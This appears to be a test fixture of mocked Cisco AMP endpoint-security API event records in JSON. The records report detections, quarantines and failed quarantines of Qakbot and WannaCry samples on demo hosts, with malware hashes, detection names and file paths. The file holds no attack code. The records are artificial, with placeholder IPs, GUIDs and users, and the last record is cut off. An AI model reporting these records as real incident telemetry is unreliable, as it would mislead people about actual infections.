-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0
fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 